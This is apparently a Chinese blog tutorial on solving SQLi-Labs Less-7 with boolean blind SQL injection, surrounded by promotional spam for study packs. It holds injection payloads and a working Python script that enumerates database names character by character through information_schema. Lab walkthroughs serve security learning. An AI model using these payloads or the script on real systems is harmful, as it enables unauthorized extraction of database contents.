SQLi LABS Less-7 布尔盲注_sqli靶场第七关使用盲注

最新推荐文章于 2024-06-09 15:53:43 发布
最新推荐文章于 2024-06-09 15:53:43 发布
阅读量1k 收藏 8
点赞数 18
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_82056337/article/details/138990235
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

「作者简介」:优快云 top200、阿里云博客专家、华为云享专家、网络安全领域优质创作者

在这里插入图片描述

第七关是单引号+双括号的字符型注入,推荐使用布尔盲注。

方式一:布尔盲注

推荐文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1’)) and 1 – a,页面正常显示
在这里插入图片描述
地址栏输入:?id=1’)) and 0 – a,页面异常(空)显示
在这里插入图片描述

第二步、判断长度

判断当前使用的数据库名长度是否大于1(肯定大于),地址栏输入:

?id=1')) and length(database()) > 1 -- a

在这里插入图片描述
判断成立,页面正常显示,文末使用Python脚本自动化判断

第三步、枚举字符

判断数据库名第一个字符的ascll码是否大于1(肯定大于),地址栏输入:

?id=1')) and ascii(substr((database()),1,1)) >1 -- a

判断成立,页面正常显示,文末使用Python脚本自动化判断

第四步、脱库

Python脚本如下,根据需求修改:

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://55aa541ede774f4da9a2d0f63c3f758c.app.mituan.zone/Less-7/"
# 猜解长度使用的payload
payload_len = """?id=1')) and length(
 (select group\_concat(schema\_name)
 from information\_schema.schemata)
) ={n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1')) and ascii(
 substr(
 (select group\_concat(schema\_name)
 from information\_schema.schemata
 ),{n},1)
) ={r} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in....' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # print('我正在猜解', n)
            # 页面中出现此内容则表示成功
            if 'You are in....' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

获取所有数据库
判断长度 payload:

?id=1')) and length(
	(select group_concat(schema_name)
	from information_schema.schemata)
) ={n} -- a

枚举字符 payload:

?id=1')) and ascii(
  substr(
    (select group_concat(schema_name)
     from information_schema.schemata
	),{n},1)
) ={r} -- a

执行结果:
在这里插入图片描述
获取 security 库的所有表
判断长度 payload:

?id=1')) and length(
	(select group_concat(table_name)


### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料


网络安全面试题


![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)


绿盟护网行动


![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)


还有大家最喜欢的黑客技术


![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)


**网络安全源码合集+工具包**


![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**



**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.youkuaiyun.com/topics/618540462)**


**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
最新polar CTF CB链_cb链 polar wp(3),2024年最新网络安全事件发机制收藏这一篇就够了
2401_84281629的博客
05-14 522
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
SQLi LABS Less-7 布尔盲注_sqli靶场第七使用(1)
2301_82056337的博客
05-17 525
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’)) and 0 – a,页面异常(空)显示。id=1’)) and 1 – a,页面正常显示。判断成立,页面正常显示,文末使用Python脚本自动化判断。判断成立,页面正常显示,文末使用Python脚本自动化判断。获取 security 库的所有表。获取 users 表的所有字段。因篇幅有限,仅展示部资料。
php接口开发 安全_PHP开发api接口安全验证
weixin_42144201的博客
03-09 392
在实际工作中,使用PHP写api接口是经常做的,PHP写好接口后,前台就可以通过链接获取接口提供的数据,而返回的数据一般为两种情况,xmljson,在这个过程中,服务器并不知道,请求的来源是什么,有可能是别人非法调用我们的接口,获取数据,因此就要使用安全验证。验证原理示意图这里写图片描述原理从图中可以看得很清楚,前台想要调用接口,需要使用几个参数生成签名。时间戳:当前时间随机数:随机生成的随机...
PHP is_numeric()函数详解,PHP判断变量是否为数字或数字字符串,is_numeric()绕过
热门推荐
wangyuxiang946的博客
06-29 1万+
二、16进制绕过 三、科学计数法绕过 四、字符串 五、is_int()is_numeric()的区别 六、type_digit()is_numeric()的区别
php is_numeric函数的绕过
qq_56426046的博客
10-11 1449
php中当一个其他数据类型数值类型的数据比较大小时,会先将其他数据类型转换成数值类型,这里输入类似1250a数据也可绕过。is numericl函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后。is_numeric(0判断变量是否为数字或数字字符串,不仅检查10进制,16进制是可以。以,查看函数发现该函数对对于第一个空格字符会跳过空格字符判断,接着后面的判断!1.数组加16进制绕过。
PHP中is_numeric函数十六进制绕过0day
weixin_34417635的博客
03-15 1385
0×00 简介国内一部CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字数字字符串则返回 TRUE,否则返回 FALSE。 0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全。   $s = is_numeric($_GET['s'])?$_GET['s']:0; $s...
Sqli-labs靶场7详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2605
SQL入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型入攻击-user()
sqli-labs第八布尔盲注
qq_42266432的博客
08-19 1633
第八看标题可知此可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是入等式或不等式时通过页面的反应能判断入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs 靶场 less-7 第七详解:OUTFILE入与配置
Superstacks超全栈
06-09 1436
SQLi-Labs是一个用于学习练习SQL入漏洞的开源应用程序。通过它,我们可以学习如何识别利用不同类型的SQL入漏洞,并了解如何修复防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔入,时间
Superstacks超全栈
06-09 1276
S接下来的工作就是之前使用的布尔入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用上面类似的入代码来进行。执行结果,成功完成入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
php中is_numeric函数的绕过
weixin_50597969的博客
04-07 5871
php中is_numeric函数的绕过方法方法方法三 $j = $_POST[j]; is_numeric($j)?die("<br/>not is numeric <br/>fail 10"):NULL; //数组+16进制绕过 j[]=58B、j=1315%20、j=%001315 if($j > 1314){ echo "<br/>pass 10";} 方法一 利用数组+十六进制来进行绕过 j[]=58B 方法二 j=1315%20 j=13
PHP黑魔法之strcmp与is_numeric绕过
Thewei666的博客
05-14 1144
当输入的两个值为不是字符串时就会产生不预期的返回值strcmp()在比较字符串数组的时候直接返回 0我们可以传入字符串数组返回 0 来达到一些目的。
PHP is_numeric() 函数
weixin_30745553的博客
07-31 968
is_numeric()函数用于检测变量是否为数字或数字字符串。 例子 <?php $var_name1=678; $var_name2="a678"; $var_name3="678"; $var_name4="runoob.com"; $var_name5=698.99; $var_name6=array("a1","a2"); $var_name...
CTF笔记:PHP函数is_numeric()绕过
qq_46145027的博客
04-30 7041
在做CTF过程中遇到的is_numeric()函数,作用是判断输入是不是数字或数字字符串。 思路1:数值->非数值 原题是[极客大挑战 2019]BuyFlag,判断代码如下: if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } 密码是404,但是不能输入数
一篇文章带你搞定PHP中的is_numeric()函数
csjjjd的博客
12-13 1547
函数别检查了一个整数、一个数字字符串一个非数字字符串。只有前两个变量被认为是数字或数字字符串,而最后一个变量被认为不是数字。函数只能判断变量是否是数字或数字字符串,它不能确保变量具体是哪种类型的数字(如整数、浮点数等)。函数用于检查一个变量是否是数字或数字字符串。函数返回一个布尔值,如果变量是数字或数字字符串,则返回。既然讲了这个函数,那就必须得学会绕过他!
表单验证的3个函数ISSET()、empty()、is_numeric()使用方法
03-14 1265
<br />本文就简单讲一下php中表单验证的三个函数,应该比较常用吧,最后给一些示例,请看下文。<br />ISSET();——适合于检测是否存在这个参数。<br />定义作用范围:用于测试一个变量是否具有值(包括0,FALSE,或者一个空字串,但不能是NULL),即:“http://localhost/?fo=”也是可以通过检测,因此不适用。但如果是“http://localhost/”参数中并不含fo参数,就可以用isset来检测,此时isset($_GET['fo'])返回false。<br />
php函数 is_numeric,PHP is_numeric()函数使用方法
weixin_39664585的博客
04-01 969
is_numeric()函数是PHP中的内置函数,用于检查作为参数传递的变量是否是数字或数字字符串。该函数返回一个布尔值。语法: bool is_numeric($ var)参数:该函数接受下面描述的单个参数: $ var:该输入参数是函数检查它是数字还是数字字符串的变量。根据此验证,函数返回一个布尔值。返回值:如果$ var是数字或数字字符串,函数返回TRUE并否则返回。例如:输入:$ var ...
php is numeric用法,PHP使用 is_numeric的实例解析
weixin_35084652的博客
03-19 531
PHP is_numeric函数用于检测变量是否为数字或数字字符串。语法is_numeric ( mixed $var )返回值如果指定的变量是数字数字字符串则返回 TRUE,否则返回 FALSE。示例$var_name1 = 678;$var_name2 = "a678";$var_name3 = "678";$var_name4 = "runoob.com";$var_name5 = 698...
php is numeric 绕过,php is_numeric函数可绕过产生SQL
weixin_39801158的博客
03-22 436
老老实实mysql_real_escape_string()防作死......is_numeric的SQL利用条件虽然有点苛刻,但还是少用的好= =一、is_numberic函数简介国内一部CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字数字字符串则返回 TRUE,否则返回 FALSE。二、函...
sqli-labs-master靶场21
最新发布
03-30
### SQLi-Labs Level 21 的解决方案 SQL 入是一种常见的 Web 安全漏洞,攻击者可以通过未经过滤的输入参数向数据库发送恶意查询。对于 SQLi-Labs 靶场中的第 21 卡(Less-21),其主要目标是通过入技术获取隐藏的数据。 #### 背景析 在这一中,应用程序可能已经部署了一定程度的安全措施来防止简单的字符串拼接型 SQL 入[^3]。然而,这些安全机制通常无法完全阻止更复杂的方法,例如布尔盲注或时间延迟。 #### 解决方案概述 为了成功完成此挑战,可以尝试以下几种常见策略: 1. **确认是否存在注入点** 使用单引号 `'` 或其他特殊字符测试 URL 参数 `id` 是否引发错误响应。这一步骤有助于判断该位置是否可被利用。 2. **枚举表名与列名** 如果直接访问数据失败,则需先了解后台使用的具体结构。可通过联合查询或者基于布尔逻辑的方式逐步推导信息[^4]。 3. **绕过防护机制** 当遇到 WAF(Web Application Firewall) 这样的防御组件时,考虑采用编码转换、大小写字母混合等方式规避检测规则[^1]。 以下是实现上述思路的一个 Python 示例代码片段用于辅助自动化过程: ```python import requests url = 'http://example.com/Less-21/' payload_true = "' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0--" payload_false = "' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='nonexistent')>0--" def check_payload(payload): params = {'id': payload} response = requests.get(url, params=params) return "You are in" in response.text # Assuming this string indicates success if check_payload(payload_true) != check_payload(payload_false): print("Potential injection point found!") else: print("No vulnerability detected.") ``` 以上脚本仅作为演示用途,请勿非法使用! #### 意事项 尽管掌握基本技巧很重要,但更重要的是理解每种技术背后的原理及其适用场景[^2]。此外,在真实环境中实施渗透测试前务必获得合法授权以免触犯法律。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值